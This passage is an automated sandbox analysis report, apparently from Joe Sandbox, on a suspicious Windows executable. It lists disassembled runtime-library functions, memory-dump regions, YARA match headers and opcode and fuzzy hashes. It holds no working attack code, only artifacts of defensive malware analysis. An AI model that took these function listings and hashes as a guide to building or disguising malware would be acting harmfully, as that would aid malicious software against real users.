                    • _ValidateLocalCookies.LIBCMT ref: 00434877
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0043487F
                    • _ValidateLocalCookies.LIBCMT ref: 00434908
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00434933
                    • _ValidateLocalCookies.LIBCMT ref: 00434988
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                    • String ID: S9C$csm
                    • API String ID: 1170836740-582408667
                    • Opcode ID: a4331c987b1b53513cbe21c672c92ef55e4810aa54a37fe5f5d469cf9e84ef45
                    • Instruction ID: 6575625a84691e9b1f9b7e8611f910fc559112cced3487189da3a48804891882
                    • Opcode Fuzzy Hash: a4331c987b1b53513cbe21c672c92ef55e4810aa54a37fe5f5d469cf9e84ef45
                    • Instruction Fuzzy Hash: 7141E874A00208ABCF10DF69C844ADF7BB4BF89318F14815BE8149B392D779EA11CF99
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: G"@$api-ms-$ext-ms-
                    • API String ID: 0-3963426706
                    • Opcode ID: b882474e2421becce6f7ac3255c006c5444dc2a1b8804bcc2ed4a91c923f1653
                    • Instruction ID: bce6c0f499f03009e687f81e13829494c96e42a1ade786342b8d5ba6f6eadec1
                    • Opcode Fuzzy Hash: b882474e2421becce6f7ac3255c006c5444dc2a1b8804bcc2ed4a91c923f1653
                    • Instruction Fuzzy Hash: 82210875A41714ABCB214B65AC4CB2F3758DB097A0F2027A3FE55A7391D738ED0086ED
                    APIs
                    • _SpinWait.LIBCONCRT ref: 0041EEBC
                    • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0041EEC8
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0041EEE1
                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041EF0F
                    • Concurrency::Context::Block.LIBCONCRT ref: 0041EF31
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                    • String ID: iA
                    • API String ID: 1182035702-1118743441
                    • Opcode ID: 51f1a6270a472bcdd30247f4592d3322b934ddd74063de143c259ec6416e4012
                    • Instruction ID: dbfce4fa691d0a98bc3aa8749e6742a9d80362ff2df78e67c0c5db40cb0b6eee
                    • Opcode Fuzzy Hash: 51f1a6270a472bcdd30247f4592d3322b934ddd74063de143c259ec6416e4012
                    • Instruction Fuzzy Hash: 1321F374C002099ADF24DFA6C4456EEB7F0FF14324F10052FE851A22C1E7B84AC6CB48
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$___from_strstr_to_strchr
                    • String ID:
                    • API String ID: 3409252457-0
                    • Opcode ID: 7e13cb0b5705e9cade751d436b5392716494f0a3c8e39469c6473571ee0f5945
                    • Instruction ID: f99befb810c5c4866eaf564f7dd7d7d58b29b2c8e151ae40169767ee9d3e76c4
                    • Opcode Fuzzy Hash: 7e13cb0b5705e9cade751d436b5392716494f0a3c8e39469c6473571ee0f5945
                    • Instruction Fuzzy Hash: CC513670D05306AFDB24AFBB9841A6E7BA4DF0D314F00616FE510972C1EA7D9940CB4D
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$___from_strstr_to_strchr
                    • String ID:
                    • API String ID: 3409252457-0
                    • Opcode ID: b36ae6f94d372ff64b4da89c0af13a455d4f54d85b457d19ac11513aadbc6f32
                    • Instruction ID: 138becd5714bc367fd7fd1f3796232093134425ba3ce5231034f38352e3834bc
                    • Opcode Fuzzy Hash: b36ae6f94d372ff64b4da89c0af13a455d4f54d85b457d19ac11513aadbc6f32
                    • Instruction Fuzzy Hash: 345144B1988305AFDF27AFB49888AED7BB5AF06314F54416EE924972C0EB71C500CF56
                    APIs
                    • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00436EE6), ref: 00436FD6
                    • GetFileInformationByHandle.KERNEL32(?,?), ref: 00437030
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00436EE6,?,000000FF,00000000,00000000), ref: 004370BE
                    • __dosmaperr.LIBCMT ref: 004370C5
                    • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00437102
                      • Part of subcall function 0043732A: __dosmaperr.LIBCMT ref: 0043735F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                    • String ID: nC
                    • API String ID: 1206951868-4036674207
                    • Opcode ID: 19e1070b04fb49a2dd5738f37f72da11fb3a5a43ccc6689087d144dd6161f976
                    • Instruction ID: 47e44e870bed0e4f5047e2c803f8af1af40435cbdbdaacedd5eb414e92fa1372
                    • Opcode Fuzzy Hash: 19e1070b04fb49a2dd5738f37f72da11fb3a5a43ccc6689087d144dd6161f976
                    • Instruction Fuzzy Hash: 25415EB6904604ABCF389FB6DC459ABBBF9EF48300F10542EF996D3211E638D940CB25
                    APIs
                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00431B42
                      • Part of subcall function 00431E11: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,0043188A), ref: 00431E21
                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00431B57
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00431B66
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00431C2A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
                    • String ID: pContext$switchState
                    • API String ID: 1312548968-2660820399
                    • Opcode ID: 84332b62cc3de3cfa4170185330e29230a9dc1dcd046b531a1b7116e20220df0
                    • Instruction ID: b863e61c3d732dd5109429b6f29941dee9b5abb7f1e972ae7809c7e47913e2a3
                    • Opcode Fuzzy Hash: 84332b62cc3de3cfa4170185330e29230a9dc1dcd046b531a1b7116e20220df0
                    • Instruction Fuzzy Hash: 8331D835A00204ABCF05EF64C881AAEB775FF4C314F20556BED1197362EB79EE05CA98
                    APIs
                    • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0042E7D7
                      • Part of subcall function 0042E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042E577
                      • Part of subcall function 0042E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042E599
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042E854
                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042E860
                    • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0042E86F
                    • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042E879
                    • Concurrency::location::_Assign.LIBCMT ref: 0042E8AD
                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E8B5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                    • String ID:
                    • API String ID: 1924466884-0
                    • Opcode ID: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
                    • Instruction ID: 01245f0547eb729828e98329900f8f6e173d559f1909e94d2917f6101dcd408e
                    • Opcode Fuzzy Hash: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
                    • Instruction Fuzzy Hash: 19415A39A00214EFCF00EF65D484AADB7B5FF48314F5480AAED499B382DB34A941CB95
                    APIs
                    • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 021AEA3E
                      • Part of subcall function 021AE7AB: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 021AE7DE
                      • Part of subcall function 021AE7AB: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 021AE800
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 021AEABB
                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 021AEAC7
                    • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 021AEAD6
                    • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 021AEAE0
                    • Concurrency::location::_Assign.LIBCMT ref: 021AEB14
                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 021AEB1C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                    • String ID:
                    • API String ID: 1924466884-0
                    • Opcode ID: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
                    • Instruction ID: 11da7d63e99ac8f4202152eebef88483690e3557810c5674036a944b558fd80f
                    • Opcode Fuzzy Hash: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
                    • Instruction Fuzzy Hash: B4413A79A40214DFCF05EFA4C494BADB7B6FF48314F1485A9DD4A9B281DB30AA42CF91
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 6C$C:\Users\user\Desktop\yjzllYsjlU.exe
                    • API String ID: 0-2072070402
                    • Opcode ID: dd2dd9f4d129958e1b06d5edd0e164f71e48155ec8fa6cde618221c2102e1a72
                    • Instruction ID: fd95ef61c06ac132fca33f58cee54c31b72be5874fd36115616c9f4bad4a65b4
                    • Opcode Fuzzy Hash: dd2dd9f4d129958e1b06d5edd0e164f71e48155ec8fa6cde618221c2102e1a72
                    • Instruction Fuzzy Hash: 8521C171605219BFDB34AF669C80E2B77BCEF08368F10551AF52892292E769EC009769
                    APIs
                    • __EH_prolog3.LIBCMT ref: 0219F0CD
                    • _SpinWait.LIBCONCRT ref: 0219F123
                    • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0219F12F
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0219F148
                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0219F176
                    • Concurrency::Context::Block.LIBCONCRT ref: 0219F198
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::H_prolog3ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                    • String ID:
                    • API String ID: 1888882079-0
                    • Opcode ID: 51f1a6270a472bcdd30247f4592d3322b934ddd74063de143c259ec6416e4012
                    • Instruction ID: 75d1ef6f29e616013cae5a1197b8f4168ff4a4c1dd678472574c9a9eebf1f5ac
                    • Opcode Fuzzy Hash: 51f1a6270a472bcdd30247f4592d3322b934ddd74063de143c259ec6416e4012
                    • Instruction Fuzzy Hash: 0E219070880219AEDF28EFA4D8457EEB7F1AF05324F50062AD065E6590EB718686CFD1
                    APIs
                      • Part of subcall function 0043F0A3: _free.LIBCMT ref: 0043F0C8
                    • _free.LIBCMT ref: 0043F129
                      • Part of subcall function 0043ADF5: HeapFree.KERNEL32(00000000,00000000,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?), ref: 0043AE0B
                      • Part of subcall function 0043ADF5: GetLastError.KERNEL32(?,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?,?), ref: 0043AE1D
                    • _free.LIBCMT ref: 0043F134
                    • _free.LIBCMT ref: 0043F13F
                    • _free.LIBCMT ref: 0043F193
                    • _free.LIBCMT ref: 0043F19E
                    • _free.LIBCMT ref: 0043F1A9
                    • _free.LIBCMT ref: 0043F1B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
                    • Instruction ID: c3a7340a8ef7a1c42761e22c66233c02557cf0a4384e4ec730fa78aa122713dc
                    • Opcode Fuzzy Hash: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
                    • Instruction Fuzzy Hash: BC118131940B04AAD930B7B2CC07FCB77EE9F08719F40183EB699A6053DA2EB5594656
                    APIs
                      • Part of subcall function 021BF30A: _free.LIBCMT ref: 021BF32F
                    • _free.LIBCMT ref: 021BF390
                      • Part of subcall function 021BB05C: HeapFree.KERNEL32(00000000,00000000,?,021BF334,?,00000000,?,?,?,021BF35B,?,00000007,?,?,021BF75D,?), ref: 021BB072
                      • Part of subcall function 021BB05C: GetLastError.KERNEL32(?,?,021BF334,?,00000000,?,?,?,021BF35B,?,00000007,?,?,021BF75D,?,?), ref: 021BB084
                    • _free.LIBCMT ref: 021BF39B
                    • _free.LIBCMT ref: 021BF3A6
                    • _free.LIBCMT ref: 021BF3FA
                    • _free.LIBCMT ref: 021BF405
                    • _free.LIBCMT ref: 021BF410
                    • _free.LIBCMT ref: 021BF41B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
                    • Instruction ID: cfc241c0e5f76d2862389ea4bd47f37c1f8fa23508d597a692294fb0f2148925
                    • Opcode Fuzzy Hash: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
                    • Instruction Fuzzy Hash: 5C110072584704EEDA32B770DC45FDBBBBE7F08700F404816F699A68A1D769B505CB90
                    APIs
                    • GetModuleHandleW.KERNEL32(004512B4,?,00000000,00000000,?,?,?,021A3E4D), ref: 0219FCE6
                    • GetProcAddress.KERNEL32(00000000,0045177C), ref: 0219FCF4
                    • GetProcAddress.KERNEL32(00000000,00451794), ref: 0219FD02
                    • GetProcAddress.KERNEL32(00000000,004517AC), ref: 0219FD30
                    • GetLastError.KERNEL32(?,?,?,021A3E4D), ref: 0219FD4B
                    • GetLastError.KERNEL32(?,?,?,021A3E4D), ref: 0219FD57
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0219FD6D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
                    • String ID:
                    • API String ID: 1654681794-0
                    • Opcode ID: 7fe6c5ece6de4c50eb3fb3b842b885c674e1d20cdf18a0be90147e923e9c19f3
                    • Instruction ID: 011a83c966c111a80b36efca6593d768b50aaaebd90b29582e52f5cba430a814
                    • Opcode Fuzzy Hash: 7fe6c5ece6de4c50eb3fb3b842b885c674e1d20cdf18a0be90147e923e9c19f3
                    • Instruction Fuzzy Hash: 8F019B3D6803117F97517BB96C89FEB37ECA904B52B240537F501D21A2EF79D4048B69
                    APIs
                      • Part of subcall function 0041C6AC: mtx_do_lock.LIBCPMT ref: 0041C6B4
                    • __Mtx_unlock.LIBCPMT ref: 00416ED1
                    • std::_Rethrow_future_exception.LIBCPMT ref: 00416F22
                    • std::_Rethrow_future_exception.LIBCPMT ref: 00416F32
                    • __Mtx_unlock.LIBCPMT ref: 00416FD5
                    • __Mtx_unlock.LIBCPMT ref: 004170DB
                    • __Mtx_unlock.LIBCPMT ref: 00417116
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$mtx_do_lock
                    • String ID:
                    • API String ID: 95294986-0
                    • Opcode ID: 046fbe0f4980c1b9ef584b946209c84bf0753a82647ed566538800b283741cc2
                    • Instruction ID: d5c402bd19617442db253326e825c470d249229bcec99b7fb150ec4f877a8494
                    • Opcode Fuzzy Hash: 046fbe0f4980c1b9ef584b946209c84bf0753a82647ed566538800b283741cc2
                    • Instruction Fuzzy Hash: D2C1E171904304ABDB20DFA5C945BEBBBF4AF04314F00456FE81697782EB79A984CB65
                    APIs
                    • __Mtx_unlock.LIBCPMT ref: 02197138
                    • std::_Rethrow_future_exception.LIBCPMT ref: 02197189
                    • std::_Rethrow_future_exception.LIBCPMT ref: 02197199
                    • __Mtx_unlock.LIBCPMT ref: 0219723C
                    • __Mtx_unlock.LIBCPMT ref: 02197342
                    • __Mtx_unlock.LIBCPMT ref: 0219737D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
                    • String ID:
                    • API String ID: 1997747980-0
                    • Opcode ID: 411bbcd3c98b8483f8dc7711dd14b2669908e861b9d7381f1d8c4d8a9dcadb8d
                    • Instruction ID: 7939d9b4bb205572fd48212a7893bfe275011b0b2413f383f11b0640b49e39c4
                    • Opcode Fuzzy Hash: 411bbcd3c98b8483f8dc7711dd14b2669908e861b9d7381f1d8c4d8a9dcadb8d
                    • Instruction Fuzzy Hash: 92C1DFB19903089FDF21DFA4C944BAFFBF5AF05314F00452EE85697681EB35AA05CBA1
                    APIs
                    • GetConsoleCP.KERNEL32(?,004087A0,00000000), ref: 0043FD08
                    • __fassign.LIBCMT ref: 0043FEE7
                    • __fassign.LIBCMT ref: 0043FF04
                    • WriteFile.KERNEL32(?,004087A0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0043FF4C
                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0043FF8C
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00440038
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileWrite__fassign$ConsoleErrorLast
                    • String ID:
                    • API String ID: 4031098158-0
                    • Opcode ID: d91de68776c85008b4a445cc7eb9458582a7ab784aea8d95e54cc580eb993dda
                    • Instruction ID: b1fa4e01d1e6861320541c535ea6890982759e22aeb82642623fb23c4c1d3398
                    • Opcode Fuzzy Hash: d91de68776c85008b4a445cc7eb9458582a7ab784aea8d95e54cc580eb993dda
                    • Instruction Fuzzy Hash: 2BD19D71D002589FDF15CFA8D980AEDBBB5BF49304F28016AE855FB342E634A946CB58
                    APIs
                    • GetConsoleCP.KERNEL32(?,02188A07,00000000), ref: 021BFF6F
                    • __fassign.LIBCMT ref: 021C014E
                    • __fassign.LIBCMT ref: 021C016B
                    • WriteFile.KERNEL32(?,02188A07,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 021C01B3
                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 021C01F3
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 021C029F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileWrite__fassign$ConsoleErrorLast
                    • String ID:
                    • API String ID: 4031098158-0
                    • Opcode ID: aeaffaf03d6c38a690940c40d1bea6644629eb38ec1b3c0d319535d1d52f1a6c
                    • Instruction ID: 7a76c36438b8e8541b6322cdb1efe73d95ba679071d6d2f4b7f41bbbc3fad3e1
                    • Opcode Fuzzy Hash: aeaffaf03d6c38a690940c40d1bea6644629eb38ec1b3c0d319535d1d52f1a6c
                    • Instruction Fuzzy Hash: 6BD19A79D00258DFCB15CFE8C880AEDBBB5EF59314F29016EE855BB242D731A946CB50
                    APIs
                    • Concurrency::location::_Assign.LIBCMT ref: 0042E91E
                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E926
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042E950
                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042E959
                    • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042E9DC
                    • Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0042E9E4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
                    • String ID:
                    • API String ID: 3929269971-0
                    • Opcode ID: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
                    • Instruction ID: e456b2d5945dcb9d16af89579036fa7bc11e47face3e2a4e749ba7397f49833a
                    • Opcode Fuzzy Hash: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
                    • Instruction Fuzzy Hash: A7418079B00219EFCB09DF65D454A6DB7B1FF48310F00816AE806A7391CB38AE41CF85
                    APIs
                    • Concurrency::location::_Assign.LIBCMT ref: 021AEB85
                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 021AEB8D
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 021AEBB7
                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 021AEBC0
                    • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 021AEC43
                    • Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 021AEC4B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
                    • String ID:
                    • API String ID: 3929269971-0
                    • Opcode ID: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
                    • Instruction ID: 65fe54865d0e913b01120750949d74d8043c6cdbb03a4bf3c83dc4c3d6793f15
